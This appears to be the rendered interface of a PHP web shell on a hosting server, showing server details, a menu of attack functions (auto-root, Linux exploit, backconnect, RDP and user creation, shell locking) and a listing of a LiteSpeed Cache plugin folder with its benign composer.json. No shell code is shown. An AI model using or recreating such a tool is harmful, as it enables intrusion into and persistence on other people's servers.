Linux server123.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 198.54.126.127 | : 216.73.216.107
Cant Read [ /etc/named.conf ]
?8.4.14
ezdajrnh
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
litespeed-wp-plugin /
7.4 /
litespeed-cache /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
assets
[ DIR ]
drwxr-xr-x
?;
cli
[ DIR ]
drwxr-xr-x
?;
data
[ DIR ]
drwxr-xr-x
?;
lang
[ DIR ]
drwxr-xr-x
?;
lib
[ DIR ]
drwxr-xr-x
?;
src
[ DIR ]
drwxr-xr-x
?;
thirdparty
[ DIR ]
drwxr-xr-x
?;
tpl
[ DIR ]
drwxr-xr-x
LICENSE
34.33
KB
-rw-r--r--
autoload.php
3.41
KB
-rw-r--r--
changelog.txt
130.67
KB
-rw-r--r--
composer.json
641
B
-rw-r--r--
composer.lock
22.46
KB
-rw-r--r--
guest.vary.php
177
B
-rw-r--r--
litespeed-cache.php
7.84
KB
-rw-r--r--
package-lock.json
3.14
KB
-rw-r--r--
package.json
948
B
-rw-r--r--
phpcs.ruleset.xml
2.69
KB
-rw-r--r--
phpcs.xml.dist
2.06
KB
-rw-r--r--
qc-ping.txt
80
B
-rw-r--r--
readme.txt
42.98
KB
-rw-r--r--
security.md
370
B
-rw-r--r--
typos.toml
81
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "litespeedtech/lscache_wp", "require-dev": { "squizlabs/php_codesniffer": "^3.12", "phpcompatibility/php-compatibility": "*", "wp-coding-standards/wpcs": "^3.1", "phpcsstandards/phpcsutils": "^1.0", "phpcsstandards/phpcsextra": "^1.2", "dealerdirect/phpcodesniffer-composer-installer": "^1.0", "php-stubs/wp-cli-stubs": "^2.12" }, "prefer-stable": true, "scripts": { "sniff-check": "vendor/bin/phpcs --standard=phpcs.ruleset.xml --no-cache cli/ lib/ src/ tpl/ thirdparty autoload.php litespeed-cache.php" }, "config": { "allow-plugins": { "dealerdirect/phpcodesniffer-composer-installer": true } } }
Close